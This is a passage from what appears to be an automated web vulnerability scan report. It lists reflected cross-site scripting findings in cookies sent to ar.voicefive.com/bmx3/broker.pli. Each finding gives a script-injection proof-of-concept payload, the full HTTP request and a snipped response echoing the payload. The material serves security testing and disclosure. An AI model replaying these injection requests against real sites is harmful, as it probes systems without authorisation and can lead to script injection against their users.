The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 9cb96<script>alert(1)</script>8bdea76f6f2 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-13033490469cb96<script>alert(1)</script>8bdea76f6f2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:27 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:27 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:27 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206907; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
;
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '875e3f1e-184.84.247.65-13033490469cb96<script>alert(1)</script>8bdea76f6f2', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p97174789": 'exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 1
...[SNIP]...

2.141. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 9c95c<script>alert(1)</script>02d6ede0968 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&9c95c<script>alert(1)</script>02d6ede0968; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:18 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206898; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&9c95c<script>alert(1)</script>02d6ede0968', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/
...[SNIP]...

2.142. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 144cd<script>alert(1)</script>4dc26a7e82d was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&144cd<script>alert(1)</script>4dc26a7e82d; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:26 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:26 2011&144cd<script>alert(1)</script>4dc26a7e82d=&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:26 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206906; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&', "ar_p82806590": 'exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&144cd<script>alert(1)</script>4dc26a7e82d', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2
...[SNIP]...

2.143. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload ff2c8<script>alert(1)</script>9d7c9813128 was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&ff2c8<script>alert(1)</script>9d7c9813128; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:26 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:26 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:26 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206906; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
u May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&ff2c8<script>alert(1)</script>9d7c9813128', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobu
...[SNIP]...

2.144. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload 45b83<script>alert(1)</script>dbcb87bd638 was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&45b83<script>alert(1)</script>dbcb87bd638; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:26 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:26 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:26 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206906; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p85001580": 'exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&45b83<script>alert(1)</script>dbcb87bd638', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...

2.145. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload 4cf27<script>alert(1)</script>a4d64bede87 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&4cf27<script>alert(1)</script>a4d64bede87; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:17 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206897; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&4cf27<script>alert(1)</script>a4d64bede87', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p85001580": 'exp=1&initExp=
...[SNIP]...

2.146. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90452457 cookie is copied into the HTML document as plain text between tags. The payload c3519<script>alert(1)</script>d44fa25d073 was submitted in the ar_p90452457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

